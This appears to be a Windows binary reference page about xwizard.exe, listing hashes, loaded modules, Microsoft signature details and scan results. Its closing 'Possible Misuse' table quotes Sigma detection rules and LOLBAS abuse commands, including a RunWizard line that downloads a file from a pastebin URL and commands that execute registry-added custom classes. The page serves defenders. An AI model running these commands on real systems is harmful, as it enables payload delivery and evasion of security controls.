xwizard.exe

  • File Path: C:\WINDOWS\system32\xwizard.exe
  • Description: Extensible Wizards Host Process

Hashes

Type Hash
MD5 B923F5EE82097A226CF403A46579870C
SHA1 667C103C62BCCFA1BB5920DF141FC210E7421EE8
SHA256 0C2A3BF4F3ED998F6A50F34785E1838DD3FCC346F6B87093ADE8E63C0D97D1A4
SHA384 E8EF28D47ECB560A24838A247BCC504110D7AC2AF307D88EFC6357C4A9AB5A80C6F1FBDCF11D896C697A9844779470D7
SHA512 3ACF2DB23D61FE71314BF3677DB707B1B045B55F83E10E07A81044A2F58830B3C9347208B9CE87FAD31BFFBD62F259FD5AB52B269EB92AF20A569AE6BA55F18B
SSDEEP 1536:LPRsSufCUodixW/5Vw+duAN/kUKiaXURDoq4OZZZLlCIib:LPaSufCUodNBVw+QAN/fnakRD68wb
IMP A64091098129483C3D876A86009BBE1E
PESHA1 F247A528BB49058B5ECA832FD408F57E1FC4982A
PE256 60E885D8E8D2D662B74A6726644EEFA81E8B2BBFFFD05FACE6C5D625BC2DD41A

Runtime Data

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\xwizard.exe.mui File
(R-D) C:\Windows\SystemResources\imageres.dll.mun File
(RW-) C:\Windows\System32 File
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22000.120_none_9d947278b86cc467 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme1077709572 Section
\Windows\Theme3461253685 Section

Loaded Modules:

Path
C:\WINDOWS\System32\combase.dll
C:\WINDOWS\System32\GDI32.dll
C:\WINDOWS\System32\gdi32full.dll
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\System32\msvcp_win.dll
C:\WINDOWS\System32\msvcrt.dll
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\System32\OLEAUT32.dll
C:\WINDOWS\System32\RPCRT4.dll
C:\WINDOWS\System32\shcore.dll
C:\WINDOWS\System32\ucrtbase.dll
C:\WINDOWS\System32\USER32.dll
C:\WINDOWS\System32\win32u.dll
C:\WINDOWS\system32\xwizard.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: xwizard.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/0c2a3bf4f3ed998f6a50f34785e1838dd3fcc346f6b87093ade8e63c0d97d1a4/detection

File Similarity (ssdeep match)

File Score
C:\Windows\system32\ComputerDefaults.exe 47
C:\WINDOWS\system32\ComputerDefaults.exe 52
C:\WINDOWS\system32\ComputerDefaults.exe 52
C:\Windows\system32\ComputerDefaults.exe 49
C:\windows\system32\ComputerDefaults.exe 52
C:\Windows\system32\ComputerDefaults.exe 43
C:\Windows\system32\xwizard.exe 47
C:\windows\system32\xwizard.exe 47
C:\Windows\system32\xwizard.exe 43
C:\WINDOWS\system32\xwizard.exe 44
C:\Windows\system32\xwizard.exe 44
C:\windows\SysWOW64\ComputerDefaults.exe 54
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 41
C:\Windows\SysWOW64\ComputerDefaults.exe 47
C:\WINDOWS\SysWOW64\ComputerDefaults.exe 43
C:\Windows\SysWOW64\ComputerDefaults.exe 47
C:\Windows\SysWOW64\ComputerDefaults.exe 41
C:\WINDOWS\SysWOW64\xwizard.exe 54
C:\Windows\SysWOW64\xwizard.exe 50
C:\Windows\SysWOW64\xwizard.exe 50
C:\windows\SysWOW64\xwizard.exe 49
C:\Windows\SysWOW64\xwizard.exe 52
C:\WINDOWS\SysWOW64\xwizard.exe 50

Possible Misuse

The following table contains possible examples of xwizard.exe being misused. While xwizard.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_class_exec_xwizard.yml title: Custom Class Execution via Xwizard DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml description: Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties. DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_class_exec_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml title: Xwizard DLL Sideloading DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ DRL 1.0
sigma proc_creation_win_dll_sideload_xwizard.yml Image\|endswith: '\xwizard.exe' DRL 1.0
LOLBAS Xwizard.yml Name: Xwizard.exe  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}  
LOLBAS Xwizard.yml Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.  
LOLBAS Xwizard.yml - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM  
LOLBAS Xwizard.yml Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.  
LOLBAS Xwizard.yml - Path: C:\Windows\System32\xwizard.exe  
LOLBAS Xwizard.yml - Path: C:\Windows\SysWOW64\xwizard.exe  

MIT License. Copyright (c) 2020-2021 Strontic.